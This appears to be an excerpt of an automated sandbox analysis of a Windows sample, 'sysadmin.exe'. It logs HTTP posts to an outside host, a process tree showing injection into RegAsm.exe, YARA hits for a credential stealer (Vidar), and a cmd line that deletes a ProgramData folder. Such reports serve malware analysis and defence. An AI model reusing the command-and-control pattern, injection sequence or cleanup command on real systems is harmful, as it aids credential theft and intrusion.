                                                                                                                                                                                                                                                          2025-01-13 19:19:02 UTC15263OUTData Raw: 66 35 36 30 6d 66 38 6d 67 30 55 46 43 55 48 38 71 4f 31 41 37 55 41 47 65 75 61 51 6e 36 6d 6a 50 4e 47 61 42 69 59 78 33 6f 70 66 31 39 38 55 67 6f 47 4a 33 6f 4e 41 4e 46 41 41 65 74 4a 6d 67 64 61 44 30 6f 47 65 68 30 74 49 41 57 33 37 56 64 74 69 47 52 39 71 6b 37 56 48 56 6a 6a 6f 50 65 6b 44 5a 6a 38 78 56 64 6f 78 6e 4c 71 68 4b 6a 47 4d 38 39 4f 4d 6a 38 78 57 54 6e 46 62 73 2b 55 56 4f 63 74 6b 79 7a 61 58 63 39 6a 63 4c 50 62 79 46 4a 46 37 6a 75 50 51 2b 31 62 57 73 36 39 48 71 32 69 78 52 6c 4e 6c 79 73 77 4c 70 32 49 32 74 79 44 58 4f 4b 32 34 78 42 56 63 6d 62 2f 41 46 51 43 48 39 35 7a 6a 35 66 58 6b 59 34 71 31 2f 5a 75 6f 6c 50 4d 47 6d 58 2b 77 6a 64 75 2b 79 53 59 78 36 35 78 30 72 6a 72 34 62 44 56 61 73 4b 30 37 4b 55 64 6e 2b 68 33
                                                                                                                                                                                                                                                          Data Ascii: f560mf8mg0UFCUH8qO1A7UAGeuaQn6mjPNGaBiYx3opf198UgoGJ3oNANFAAetJmgdaD0oGeh0tIAW37VdtiGR9qk7VHVjjoPekDZj8xVdoxnLqhKjGM89OMj8xWTnFbs+UVOctkyzaXc9jcLPbyFJF7juPQ+1bWs69Hq2ixRlNlyswLp2I2tyDXOK24xBVcmb/AFQCH95zj5fXkY4q1/ZuolPMGmX+wjdu+ySYx65x0rjr4bDVasK07KUdn+h3
                                                                                                                                                                                                                                                          2025-01-13 19:19:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:19:03 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:19:04 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          47192.168.2.449819116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:19:04 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----16fct00rimgdjmo8gv3w
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:19:04 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 31 36 66 63 74 30 30 72 69 6d 67 64 6a 6d 6f 38 67 76 33 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 31 36 66 63 74 30 30 72 69 6d 67 64 6a 6d 6f 38 67 76 33 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 31 36 66 63 74 30 30 72 69 6d 67 64 6a 6d 6f 38 67 76 33 77 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------16fct00rimgdjmo8gv3wContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------16fct00rimgdjmo8gv3wContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------16fct00rimgdjmo8gv3wCont
                                                                                                                                                                                                                                                          2025-01-13 19:19:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:19:05 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:19:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          48192.168.2.449826116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:19:06 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----26xb16pzua1vaasj5phv
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:19:06 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 78 62 31 36 70 7a 75 61 31 76 61 61 73 6a 35 70 68 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 32 36 78 62 31 36 70 7a 75 61 31 76 61 61 73 6a 35 70 68 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 32 36 78 62 31 36 70 7a 75 61 31 76 61 61 73 6a 35 70 68 76 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------26xb16pzua1vaasj5phvContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------26xb16pzua1vaasj5phvContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------26xb16pzua1vaasj5phvCont
                                                                                                                                                                                                                                                          2025-01-13 19:19:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:19:06 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:19:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                          Start time:14:18:01
                                                                                                                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\sysadmin.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\sysadmin.exe"
                                                                                                                                                                                                                                                          Imagebase:0x1a6bdf60000
                                                                                                                                                                                                                                                          File size:1'662'464 bytes
                                                                                                                                                                                                                                                          MD5 hash:E5F9640FB525C58FEC8901B16F41C9A5
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                          Start time:14:18:02
                                                                                                                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline"
                                                                                                                                                                                                                                                          Imagebase:0x7ff7af9d0000
                                                                                                                                                                                                                                                          File size:2'759'232 bytes
                                                                                                                                                                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                          Start time:14:18:02
                                                                                                                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                          Start time:14:18:03
                                                                                                                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8D13.tmp" "c:\Users\user\AppData\Local\Temp\jhtixtpk\CSCCDB7263B207A4F1CADFD2FC19D91DBC.TMP"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6d8430000
                                                                                                                                                                                                                                                          File size:52'744 bytes
                                                                                                                                                                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                          Start time:14:18:05
                                                                                                                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                          Imagebase:0xa10000
                                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: infostealer_win_vidar_strings_nov23, Description: Finds Vidar samples based on the specific strings, Source: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Sekoia.io
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                          Start time:14:18:16
                                                                                                                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                          Start time:14:18:17
                                                                                                                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2280,i,2341868853609439944,236191859647242175,262144 /prefetch:8
                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                          Start time:14:19:05
                                                                                                                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\3wtj5" & exit
                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                          Start time:14:19:05
                                                                                                                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                          Start time:14:19:05
                                                                                                                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:timeout /t 10
                                                                                                                                                                                                                                                          Imagebase:0x290000
                                                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:27.9%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                                            Total number of Nodes:18
                                                                                                                                                                                                                                                            Total number of Limit Nodes:0

                                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                                            callgraph 0 Function_00007FFD9B7E056A 1 Function_00007FFD9B7E16E9 31 Function_00007FFD9B7E1100 1->31 2 Function_00007FFD9B7E0CEB 3 Function_00007FFD9B7E0665 4 Function_00007FFD9B7E09E8 5 Function_00007FFD9B7E1868 24 Function_00007FFD9B7E1188 5->24 5->31 6 Function_00007FFD9B7E23E4 7 Function_00007FFD9B7E20DD 8 Function_00007FFD9B7E02DD 9 Function_00007FFD9B7E0DE0 73 Function_00007FFD9B7E05D8 9->73 10 Function_00007FFD9B7E22E0 11 Function_00007FFD9B7E05E0 12 Function_00007FFD9B7E057A 13 Function_00007FFD9B7E0CFA 14 Function_00007FFD9B7E2FFC 15 Function_00007FFD9B7E1078 16 Function_00007FFD9B7E1378 17 Function_00007FFD9B7E04F7 18 Function_00007FFD9B7E0673 19 Function_00007FFD9B7E0F6D 20 Function_00007FFD9B7E0C6D 21 Function_00007FFD9B7E016D 22 Function_00007FFD9B7E000C 23 Function_00007FFD9B7E1105 76 Function_00007FFD9B7E1ED2 23->76 24->16 25 Function_00007FFD9B7E1388 24->25 26 Function_00007FFD9B7E1D81 26->76 27 Function_00007FFD9B7E0AFD 28 Function_00007FFD9B7E0A7D 29 Function_00007FFD9B7E107D 30 Function_00007FFD9B7E1CFD 30->16 30->25 32 Function_00007FFD9B7E069A 33 Function_00007FFD9B7E1519 34 Function_00007FFD9B7E2099 35 Function_00007FFD9B7E1F15 35->34 36 Function_00007FFD9B7E1B98 37 Function_00007FFD9B7E0713 38 Function_00007FFD9B7E038D 39 Function_00007FFD9B7E1090 40 Function_00007FFD9B7E1590 40->39 41 Function_00007FFD9B7E1029 42 Function_00007FFD9B7E17A6 42->31 43 Function_00007FFD9B7E15A5 44 Function_00007FFD9B7E1428 45 Function_00007FFD9B7E2BA2 74 Function_00007FFD9B7E0B58 45->74 46 Function_00007FFD9B7E2521 47 Function_00007FFD9B7E03A3 48 Function_00007FFD9B7E031D 49 Function_00007FFD9B7E0A1D 50 Function_00007FFD9B7E0A9D 51 Function_00007FFD9B7E0C9D 52 Function_00007FFD9B7E06A0 53 Function_00007FFD9B7E0735 61 Function_00007FFD9B7E0548 53->61 54 Function_00007FFD9B7E32B7 54->44 55 Function_00007FFD9B7E08B1 56 Function_00007FFD9B7E09B1 57 Function_00007FFD9B7E00AD 58 Function_00007FFD9B7E012D 59 Function_00007FFD9B7E0CAD 60 Function_00007FFD9B7E064A 62 Function_00007FFD9B7E1448 63 Function_00007FFD9B7E2744 63->45 64 Function_00007FFD9B7E2FC4 65 Function_00007FFD9B7E093E 65->11 66 Function_00007FFD9B7E0BBD 67 Function_00007FFD9B7E11DA 68 Function_00007FFD9B7E155B 68->15 69 Function_00007FFD9B7E0CDB 70 Function_00007FFD9B7E2655 71 Function_00007FFD9B7E21D8 72 Function_00007FFD9B7E0C58 75 Function_00007FFD9B7E0CD2 77 Function_00007FFD9B7E1B53 77->24 78 Function_00007FFD9B7E164E 79 Function_00007FFD9B7E014D

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 00007FFD9B7E2744 Relevance: 1.9, APIs: 1, Instructions: 433processCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1728281949.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_sysadmin.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                                                                                                            • Opcode ID: 89e5e40c720037e92c1b72c62637d136360d8f4f0d1d28384a90e9c47dd66697
                                                                                                                                                                                                                                                            • Instruction ID: 5f82962ff92cb818c65f6a68ebba6b072ef7c7d8376865ff367a6ed9c79ac9aa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89e5e40c720037e92c1b72c62637d136360d8f4f0d1d28384a90e9c47dd66697
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9D18530A18A8D4FDB68EF58DC567E977D1FF58310F11422AD84EC72A1DE74AA418B82
                                                                                                                                                                                                                                                            Function 00007FFD9B7E23E4 Relevance: 1.6, APIs: 1, Instructions: 148injectionCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1728281949.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_sysadmin.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                                                                                                            • Opcode ID: e98346b9586050773456f87bdb894ede6dbe624137e89ae2647faa2c75e85f3d
                                                                                                                                                                                                                                                            • Instruction ID: 5febe7d0681bcba2129648f7bbae17a1d34bf885b65d6f0cc536961b676a0a72
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e98346b9586050773456f87bdb894ede6dbe624137e89ae2647faa2c75e85f3d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F41D53190CB4C4FDB289F9898466FDBBE0FF95310F00426FE499D3296DE74A8458B92
                                                                                                                                                                                                                                                            Function 00007FFD9B7E2521 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1728281949.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_sysadmin.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                                                                                                            • Opcode ID: 2c40f173b3993d546f5b508460857c464e57fe6a5f49377c41ed1594559ada23
                                                                                                                                                                                                                                                            • Instruction ID: a4bf9a16ba8859eba3d9534ca2684e9dca402e201a067b4f38a112d448b49f75
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c40f173b3993d546f5b508460857c464e57fe6a5f49377c41ed1594559ada23
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6041E93190CB4C8FDB18DF9898556FD7BE0EF99311F0442AFE089D3292CA74A845CB86
                                                                                                                                                                                                                                                            Function 00007FFD9B7E22E0 Relevance: 1.6, APIs: 1, Instructions: 130memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 67 7ffd9b7e22e0-7ffd9b7e22e7 68 7ffd9b7e22e9-7ffd9b7e22f1 67->68 69 7ffd9b7e22f2-7ffd9b7e23b1 VirtualAllocEx 67->69 68->69 74 7ffd9b7e23b9-7ffd9b7e23df 69->74 75 7ffd9b7e23b3 69->75 75->74
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1728281949.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_sysadmin.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                            • Opcode ID: 0fdd941c82d0f7db8816794e24e1dc2cd190b0f65013c32e9401d5b2ac466ecf
                                                                                                                                                                                                                                                            • Instruction ID: 8c7a3c42150770c74fba6d5cee53918f6d993571e5d2b7b05af0fcc3715c233f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fdd941c82d0f7db8816794e24e1dc2cd190b0f65013c32e9401d5b2ac466ecf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA311831A0CB4C4FDB1CAB6898166ED7BE0EF55720F00436ED05AC3292DA6468128BC5
                                                                                                                                                                                                                                                            Function 00007FFD9B7E21D8 Relevance: 1.6, APIs: 1, Instructions: 129threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1728281949.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_sysadmin.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                            • String ID:
